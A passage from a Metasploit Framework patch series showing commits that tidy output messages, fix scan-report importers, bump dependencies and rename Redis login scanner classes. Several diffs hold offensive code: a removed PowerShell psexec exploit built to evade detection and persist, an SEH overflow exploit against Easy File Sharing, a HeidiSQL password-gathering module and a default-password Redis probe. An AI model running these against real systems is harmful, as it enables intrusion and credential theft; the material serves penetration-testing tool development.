where stageless payloads call in on the same URI when they # first connect. From there, we tell them to callback on a connect URI that @@ -272,7 +281,7 @@ protected resp.body = pkt.to_r when :init_python - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Python payload ...") + print_status("Staging Python payload ...") url = payload_uri(req) + conn_id + '/' blob = "" @@ -301,7 +310,7 @@ protected }) when :init_java - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Java payload ...") + print_status("Staging Java payload ...") url = payload_uri(req) + conn_id + "/\x00" blob = obj.generate_stage( @@ -325,7 +334,7 @@ protected }) when :init_native - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Staging Native payload ...") + print_status("Staging Native payload ...") url = payload_uri(req) + conn_id + "/\x00" uri = URI(payload_uri(req) + conn_id) @@ -356,7 +365,7 @@ protected }) when :connect - print_status("#{listener_uri} handling request from #{cli.peerhost}; (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...") + print_status("Attaching orphaned/stageless session ...") resp.body = '' conn_id = req.relative_resource @@ -376,7 +385,7 @@ protected else unless [:unknown_uuid, :unknown_uuid_url].include?(info[:mode]) - print_status("#{listener_uri} handling request from #{cli.peerhost}; Unknown request to #{request_summary}") + print_status("Unknown request to #{request_summary}") end resp.code = 200 resp.message = 'OK' From aaa1515ba04ce0e2473490dc469c7bcbafd66e1f Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 30 Mar 2016 11:56:09 -0500 Subject: [PATCH 636/686] Print rhost:rport --- .../windows/gather/credentials/heidisql.rb | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/credentials/heidisql.rb b/modules/post/windows/gather/credentials/heidisql.rb index 133b3d4dd5..80d236308e 100644 --- a/modules/post/windows/gather/credentials/heidisql.rb +++ b/modules/post/windows/gather/credentials/heidisql.rb @@ -27,15 +27,27 @@ class MetasploitModule < Msf::Post )) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + def run userhives=load_missing_hives() userhives.each do |hive| - next if hive['HKU'] == nil + next if hive['HKU'].nil? print_status("Looking at Key #{hive['HKU']}") begin subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers") - if subkeys.nil? or subkeys.empty? - print_status ("HeidiSQL not installed for this user.") + if subkeys.blank? + print_status("HeidiSQL not installed for this user.") next end From 0c6b4d81c8511d37d6bcceceb01d1e1a2ed63c61 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Wed, 30 Mar 2016 12:09:40 -0500 Subject: [PATCH 637/686] More proper exception handling --- modules/post/windows/gather/credentials/heidisql.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/credentials/heidisql.rb b/modules/post/windows/gather/credentials/heidisql.rb index 80d236308e..2b9d262719 100644 --- a/modules/post/windows/gather/credentials/heidisql.rb +++ b/modules/post/windows/gather/credentials/heidisql.rb @@ -82,7 +82,7 @@ class MetasploitModule < Msf::Post print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user} Password: #{pass}") service_data = { - address: host, + address: host == '127.0.0.1' ? rhost : host, port: port, service_name: service_types[db_type], protocol: 'tcp', @@ -154,8 +154,9 @@ class MetasploitModule < Msf::Post end end - rescue - print_error("Cannot Access User SID: #{hive['HKU']}") + rescue ::Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}") end end unload_our_hives(userhives) From dee9adbc50a7ed42edd1d33c4d75764f57844de0 Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 4 Jan 2016 07:51:41 -0600 Subject: [PATCH 638/686] Remove deprecated psexec_psh module --- modules/exploits/windows/smb/psexec_psh.rb | 105 --------------------- 1 file changed, 105 deletions(-) delete mode 100644 modules/exploits/windows/smb/psexec_psh.rb diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb deleted file mode 100644 index 8bb4b2e71c..0000000000 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ /dev/null @@ -1,105 +0,0 @@ -# -*- coding: binary -*- - -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'msf/core/exploit/powershell' - -class MetasploitModule < Msf::Exploit::Remote - Rank = ManualRanking - - # Exploit mixins should be called first - include Msf::Exploit::Remote::SMB::Client::Psexec - include Msf::Exploit::Powershell - include Msf::Module::Deprecated - - deprecated(Date.new(2016, 1, 1), 'exploit/windows/smb/psexec') - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Windows Authenticated Powershell Command Execution', - 'Description' => %q{ - This module uses a valid administrator username and password to execute a powershell - payload using a similar technique to the "psexec" utility provided by SysInternals. The - payload is encoded in base64 and executed from the commandline using the -encodedcommand - flag. Using this method, the payload is never written to disk, and given that each payload - is unique, is less prone to signature based detection. A persist option is provided to - execute the payload in a while loop in order to maintain a form of persistence. In the - event of a sandbox observing PSH execution, a delay and other obfuscation may be added to - avoid detection. In order to avoid interactive process notifications for the current user, - the psh payload has been reduced in size and wrapped in a powershell invocation which hides - the window entirely. - }, - - 'Author' => [ - 'Royce @R3dy__ Davis ', # PSExec command module - 'RageLtMan ' # PSH exploit, libs, encoders - ], - 'License' => MSF_LICENSE, - 'Privileged' => true, - 'DefaultOptions' => - { - 'WfsDelay' => 10, - 'EXITFUNC' => 'thread' - }, - 'Payload' => - { - 'Space' => 3072, - 'DisableNops' => true - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jan 01 1999', - 'References' => [ - [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) - [ 'OSVDB', '3106'], - [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ], - [ 'URL', 'http://sourceforge.net/projects/smbexec/' ], - [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ] - ] - )) - - register_options([ - OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]), - ], self.class) - end - - def exploit - command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) - if datastore['DryRun'] - print_good command.inspect - return - end - - if datastore['PSH::persist'] and not datastore['DisablePayloadHandler'] - print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option") - end - - # Try and authenticate with given credentials - if connect - begin - smb_login - rescue StandardError => autherror - fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") - end - # Execute the powershell command - print_status("Executing the payload...") - begin - return psexec(command) - rescue StandardError => exec_command_error - fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}") - ensure - disconnect - end - end - end - -end - From 8f0d664a3843442532d8a14efae72c0fb2a03f8e Mon Sep 17 00:00:00 2001 From: Brian Patterson Date: Wed, 30 Mar 2016 17:44:26 -0500 Subject: [PATCH 639/686] Modify the open_vas importer to support both results.xml and reports.xml open_vas exports and modify the nessus importer to import what it can when it can't find a properly formatted port number --- lib/msf/core/db_manager/import.rb | 5 ++++- lib/msf/core/db_manager/import/nessus.rb | 16 +++++++++------- lib/msf/core/db_manager/import/open_vas.rb | 2 +- lib/rex/parser/openvas_nokogiri.rb | 10 ++++++---- 4 files changed, 20 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index c5a0e9d8d4..3a243fdfb1 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -254,6 +254,9 @@ module Msf::DBManager::Import elsif (firstline.index("")) @import_filedata[:type] = "Retina XML" return :retina_xml + elsif (firstline.index(//)) + @import_filedata[:type] = "OpenVAS XML" + return :openvas_new_xml elsif (firstline.index(//)) @import_filedata[:type] = "OpenVAS XML" return :openvas_new_xml @@ -286,7 +289,7 @@ module Msf::DBManager::Import @import_filedata[:type] = "Nmap XML" return :nmap_xml when "openvas-report" - @import_filedata[:type] = "OpenVAS Report" + @import_filedata[:type] = "OpenVAS" return :openvas_xml when "NessusClientData" @import_filedata[:type] = "Nessus XML (v1)" diff --git a/lib/msf/core/db_manager/import/nessus.rb b/lib/msf/core/db_manager/import/nessus.rb index 078438d922..cbfeeb7e4a 100644 --- a/lib/msf/core/db_manager/import/nessus.rb +++ b/lib/msf/core/db_manager/import/nessus.rb @@ -12,20 +12,22 @@ module Msf::DBManager::Import::Nessus # Nessus NBE and NESSUS v1 methods # def handle_nessus(wspace, hobj, port, nasl, plugin_name, severity, data,task=nil) + addr = hobj.address # The port section looks like: # http (80/tcp) p = port.match(/^([^\(]+)\((\d+)\/([^\)]+)\)/) - return if not p - # Unnecessary as the caller should already have reported this host - #report_host(:workspace => wspace, :host => addr, :state => Msf::HostState::Alive) - name = p[1].strip - port = p[2].to_i - proto = p[3].downcase + if p + name = p[1].strip + port = p[2].to_i + proto = p[3].downcase + else + port = nil + end info = { :workspace => wspace, :host => hobj, :port => port, :proto => proto, :task => task } - if name != "unknown" and name[-1,1] != "?" + if name and name != "unknown" and name[-1,1] != "?" info[:name] = name end report_service(info) diff --git a/lib/msf/core/db_manager/import/open_vas.rb b/lib/msf/core/db_manager/import/open_vas.rb index 9991d19e86..f2ef38929f 100644 --- a/lib/msf/core/db_manager/import/open_vas.rb +++ b/lib/msf/core/db_manager/import/open_vas.rb @@ -29,6 +29,6 @@ module Msf::DBManager::Import::OpenVAS filename = args[:filename] wspace = args[:wspace] || workspace - raise Msf::DBImportError.new("No OpenVAS XML support. Please submit a patch to msfdev[at]metasploit.com") + raise Msf::DBImportError.new("No OpenVas XML support. Please submit a patch to msfdev[at]metasploit.com") end end diff --git a/lib/rex/parser/openvas_nokogiri.rb b/lib/rex/parser/openvas_nokogiri.rb index 07fd3c6b82..b38d034abe 100644 --- a/lib/rex/parser/openvas_nokogiri.rb +++ b/lib/rex/parser/openvas_nokogiri.rb @@ -4,7 +4,7 @@ require "rex/parser/nokogiri_doc_mixin" module Rex module Parser - # If Nokogiri is available, define OpenVAS document class. + # If Nokogiri is available, define OpenVas document class. load_nokogiri && class OpenVASDocument < Nokogiri::XML::SAX::Document include NokogiriDocMixin @@ -37,8 +37,10 @@ module Parser @state[:vuln_name] = @text.strip if @text end when 'description' - @state[:has_text] = true - @state[:vuln_desc] = @text.strip if @text + if in_tag('result') + @state[:has_text] = true + @state[:vuln_desc] = @text.strip if @text + end when 'bid' if in_tag('result') && in_tag('nvt') @state[:has_text] = true @@ -62,7 +64,7 @@ module Parser when 'subnet' @state[:has_text] = true when 'result' - record_vuln if in_tag('results') + record_vuln when 'threat' @state[:has_text] = true if in_tag('ports') && in_tag('port') when 'host' From 6c602dae90f21ec88f605b5f5b840de9eeaf4c1d Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 31 Mar 2016 14:03:59 +1000 Subject: [PATCH 640/686] Bump payloads to 1.1.5 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 874f9e4fbc..0bfef26ad5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.4) + metasploit-payloads (= 1.1.5) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -130,7 +130,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.4) + metasploit-payloads (1.1.5) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index d84be8c93a..752b93bfef 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.4' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.5' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 46d4b533f3e41992695d00d5d62c40faff261fc2 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 11:29:30 -0500 Subject: [PATCH 641/686] Add rspec for lib/net/dns/names/names.rb --- spec/lib/net/dns/names/names_spec.rb | 129 +++++++++++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 spec/lib/net/dns/names/names_spec.rb diff --git a/spec/lib/net/dns/names/names_spec.rb b/spec/lib/net/dns/names/names_spec.rb new file mode 100644 index 0000000000..96ea39a86f --- /dev/null +++ b/spec/lib/net/dns/names/names_spec.rb @@ -0,0 +1,129 @@ +require 'msf/core' + +RSpec.describe Net::DNS::Names do + subject do + obj = Object.new + obj.extend(described_class) + end + + describe '#dn_expand' do + context 'when offset is great than packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 10 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + INT16SZ' do + let(:packet) do + "\xc0" + end + + let(:offset) do + 0 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 4 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + end + + describe '#pack_name' do + context 'when name data size is larger than 255 bytes' do + let(:name) do + 'A' * (255+1) + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + + context 'when label data is larger than 63 bytes' do + let(:name) do + 'A' * (63+1) + '.' + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + end + + describe '#names_array' do + let(:name) do + "AAA.AAA" + end + + it 'returns an Array' do + expect(subject.names_array(name)).to be_kind_of(Array) + end + end + + describe '#dn_comp' do + let(:name) do + 'AAAA' + end + + let(:offset) do + 0 + end + + let(:compnames) do + {} + end + + it 'returns 3 values' do + v = subject.dn_comp(name, offset, compnames) + expect(v.length).to eq(3) + expect(v[0]).to be_kind_of(String) + expect(v[1]).to be_kind_of(Fixnum) + expect(v[2]).to be_kind_of(Hash) + end + end + + describe '#valid?' do + context 'when FQDN is valid' do + let(:fqdn) do + 'example.com' + end + + it 'returns the FQDN' do + expect(subject.valid?(fqdn)).to eq(fqdn) + end + + end + + context 'when FQDN is not valid' do + let(:fqdn) do + 'INVALID' + end + + it 'raises ArgumentError exception' do + expect { subject.valid?(fqdn) }.to raise_exception(ArgumentError) + end + end + end +end \ No newline at end of file From 9fc7921a31ae571ec88c22a75cbd65ea2fcdea0c Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 31 Mar 2016 23:40:15 +0200 Subject: [PATCH 642/686] bump ruby version --- .ruby-version | 2 +- .travis.yml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/.ruby-version b/.ruby-version index ebf14b4698..63a1a1ca3c 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.1.8 +2.1.9 diff --git a/.travis.yml b/.travis.yml index 97540b358a..2178423f70 100644 --- a/.travis.yml +++ b/.travis.yml @@ -10,7 +10,7 @@ addons: - graphviz language: ruby rvm: - - '2.1.8' + - '2.1.9' env: - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true @@ -45,4 +45,4 @@ git: branches: except: - gh-pages - - metakitty \ No newline at end of file + - metakitty From f33e9940508ae7f1239ada652629a1c4464d3ad1 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 16:56:54 -0500 Subject: [PATCH 643/686] Delete anything related to configuring/saving username --- modules/auxiliary/scanner/redis/redis_login.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index 4583e84bb0..b49da0c418 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) # redis does not have an username, there's only password - deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS') + deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS', 'DB_ALL_CREDS') end def run_host(ip) @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Auxiliary case result.status when Metasploit::Model::Login::Status::SUCCESSFUL + credential_data.delete(:username) # This service uses no username credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) From 5fdea91e93dfe1d4fb5aaa74c73099e26f882892 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 17:00:29 -0500 Subject: [PATCH 644/686] Change naming --- lib/metasploit/framework/login_scanner/redis.rb | 2 +- modules/auxiliary/scanner/redis/redis_login.rb | 5 +++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/redis.rb b/lib/metasploit/framework/login_scanner/redis.rb index c60b3c573f..dc0d12f3b0 100644 --- a/lib/metasploit/framework/login_scanner/redis.rb +++ b/lib/metasploit/framework/login_scanner/redis.rb @@ -10,7 +10,7 @@ module Metasploit # It is responsible for taking a single target, and a list of credentials # and attempting them. It then saves the results. - class REDIS + class Redis include Metasploit::Framework::LoginScanner::Base include Metasploit::Framework::LoginScanner::RexSocket include Metasploit::Framework::Tcp::Client diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index b49da0c418..96d57ced23 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -7,7 +7,8 @@ require 'msf/core' require 'metasploit/framework/login_scanner/redis' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Redis include Msf::Auxiliary::Scanner @@ -52,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary cred_collection = prepend_db_passwords(cred_collection) - scanner = Metasploit::Framework::LoginScanner::REDIS.new( + scanner = Metasploit::Framework::LoginScanner::Redis.new( host: ip, port: rport, proxies: datastore['PROXIES'], From 2e7d07ff5355d6fec5e8007cd8e7d5ab72ab4ebc Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 17:12:00 -0500 Subject: [PATCH 645/686] Fix PASSWORD datastore option --- lib/msf/core/auxiliary/redis.rb | 2 +- modules/auxiliary/scanner/redis/redis_login.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 3b0d3c6e8e..1e459c437d 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -20,7 +20,7 @@ module Msf register_options( [ Opt::RPORT(6379), - OptString.new('Password', [false, 'Redis password for authentication test', 'foobared']) + OptString.new('PASSWORD', [false, 'Redis password for authentication test', 'foobared']) ] ) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb index 96d57ced23..3c20561c86 100644 --- a/modules/auxiliary/scanner/redis/redis_login.rb +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -10,10 +10,10 @@ require 'metasploit/framework/credential_collection' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Redis include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Redis def initialize(info = {}) super( From 4d76b0e6a53ae4b131b6244fcc10785b3697cdb0 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 17:13:08 -0500 Subject: [PATCH 646/686] Rm auxiliary/scanner/misc/redis_server Please use auxiliary/scanner/redis/redis_server or auxiliary/scanner/redis/redis_login instead --- .../auxiliary/scanner/misc/redis_server.rb | 84 ------------------- 1 file changed, 84 deletions(-) delete mode 100644 modules/auxiliary/scanner/misc/redis_server.rb diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb deleted file mode 100644 index 66de20acfc..0000000000 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ /dev/null @@ -1,84 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Auxiliary - - include Msf::Module::Deprecated - deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server') - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::Tcp - - def initialize(info={}) - super(update_info(info, - 'Name' => 'Redis-server Scanner', - 'Description' => %q{ - This module scans for Redis server. By default Redis has no auth. If auth - (password only) is used, it is then possible to execute a brute force attack on - the server. This scanner will find open or password protected Redis servers and - report back the server information - }, - 'Author' => [ 'iallison ' ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - Opt::RPORT(6379), - ], self.class) - - deregister_options('RHOST') - end - - def run_host(ip) - print_status("Scanning IP: #{ip.to_s}") - begin - pkt = "PING\r\n" - connect - sock.put(pkt) - res = sock.get_once - - if res =~ /PONG/ - info = "INFO\r\n" - sock.put(info) - data = sock.get_once - print_status("Redis Server Information #{data}") - data_sanitized = data.to_s - elsif res =~ /ERR/ - auth = "AUTH foobared\r\n" - sock.put(auth) - data = sock.get_once - print_status("Response: #{data.chop}") - if data =~ /\-ERR\sinvalid\spassword/ - print_status("Redis server is using AUTH") - else - print_good("Redis server is using the default password of foobared") - report_note( - :host => rhost, - :port => rport, - :type => 'password', - :data => 'foobared' - ) - end - else - print_error "#{ip} does not have a Redis server" - end - - report_service( - :host => rhost, - :port => rport, - :name => "redis server", - :info => data_sanitized - ) - - disconnect - - rescue ::Exception => e - print_error "Unable to connect: #{e.to_s}" - end - end -end From 618f379488a7b7def7397cd0c9fea51dbe9ba750 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 17:14:49 -0500 Subject: [PATCH 647/686] Update auxiliary/scanner/redis/redis_server and mixin --- lib/msf/core/auxiliary/redis.rb | 2 +- modules/auxiliary/scanner/redis/redis_server.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/redis.rb b/lib/msf/core/auxiliary/redis.rb index 1e459c437d..9867ad0664 100644 --- a/lib/msf/core/auxiliary/redis.rb +++ b/lib/msf/core/auxiliary/redis.rb @@ -54,7 +54,7 @@ module Msf if /(?ERR operation not permitted|NOAUTH Authentication required)/i =~ command_response fail_with(::Msf::Module::Failure::BadConfig, "#{peer} requires authentication but Password unset") unless datastore['Password'] vprint_status("Requires authentication (#{printable_redis_response(auth_response, false)})") - if (auth_response = send_redis_command('AUTH', datastore['Password'])) + if (auth_response = send_redis_command('AUTH', datastore['PASSWORD'])) unless auth_response =~ /\+OK/ vprint_error("Authentication failure: #{printable_redis_response(auth_response)}") return diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index eeabe3890c..69d0405e61 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Redis Scanner', + 'Name' => 'Redis Command Execute Scanner', 'Description' => %q( This module locates Redis endpoints by attempting to run a specified Redis command. From 2a9f813bcdf9ec12c12e8c23f34a3bb76aceec9d Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 1 Apr 2016 09:53:25 +1000 Subject: [PATCH 648/686] Don't interpreter blank string as error --- .../ui/console/command_dispatcher/powershell.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb index 7069217692..6a9d62b56e 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb @@ -105,10 +105,12 @@ class Console::CommandDispatcher::Powershell } result = client.powershell.import_file(opts) - if !result.blank? && result != false - print_good("File successfully imported. Result:\n#{result}") - else + if result.nil? || result == false print_error("File failed to load.") + elsif result.empty? + print_good("File successfully imported. No result was returned.") + else + print_good("File successfully imported. Result:\n#{result}") end end From f3336c70036c3b2573eefd1abd261a43d15eeb27 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 19:24:06 -0500 Subject: [PATCH 649/686] Update windows/http/easyfilesharing_seh --- .../windows/http/easyfilesharing_seh.rb | 23 +++++++++++-------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/http/easyfilesharing_seh.rb b/modules/exploits/windows/http/easyfilesharing_seh.rb index 56e8b7f0f2..4da86d6373 100644 --- a/modules/exploits/windows/http/easyfilesharing_seh.rb +++ b/modules/exploits/windows/http/easyfilesharing_seh.rb @@ -5,16 +5,16 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote - Rank = AverageRanking + Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, - 'Name' => 'Easy File Sharing FTP Server 7.2 SEH Overflow', + 'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow', 'Description' => %q{ This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software. }, @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'URL', 'https://www.exploit-db.com/exploits/39008/' ], + [ 'EDB', '39008' ], ], 'Privileged' => true, 'DefaultOptions' => @@ -38,23 +38,28 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows Universal', { 'Ret' => 0x10019798 } ], + [ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ], ], - 'DisclosureDate' => 'December 2, 2015', + 'DefaultOptions' => { + 'RPORT' => 80 + }, + 'DisclosureDate' => 'Dec 2 2015', 'DefaultTarget' => 0)) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + def exploit connect - print_status("Generating Shell Code") + print_status("Sending exploit...") sploit = "GET " sploit << rand_text_alpha_upper(4061) - print_status("Generating Short jump") sploit << generate_seh_record(target.ret) sploit << make_nops(19) sploit << payload.encoded sploit << make_nops(7) - print_status("Buffer length is: #{4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20}") sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20) sploit << " HTTP/1.0\r\n\r\n" sock.put(sploit) From ae0aecdd0321862df1fe27fcafc5371f11b96e9e Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Thu, 31 Mar 2016 19:36:02 -0500 Subject: [PATCH 650/686] Change class name for exploits/windows/ftp/pcman_put.rb --- modules/exploits/windows/ftp/pcman_put.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 03e0d490ee..0379c0c577 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp From 384f079fcd4b64396d735092b54d69f1fecd706d Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 1 Apr 2016 16:07:07 +0200 Subject: [PATCH 651/686] revert travis.yml for now --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 2178423f70..4d4c2e3576 100644 --- a/.travis.yml +++ b/.travis.yml @@ -10,7 +10,7 @@ addons: - graphviz language: ruby rvm: - - '2.1.9' + - '2.1.8' env: - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true From 41b802a8a256254452bea57498930b576fc2ba54 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 1 Apr 2016 11:45:19 -0500 Subject: [PATCH 652/686] Clean up module --- .../auxiliary/scanner/ssh/juniper_backdoor.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index 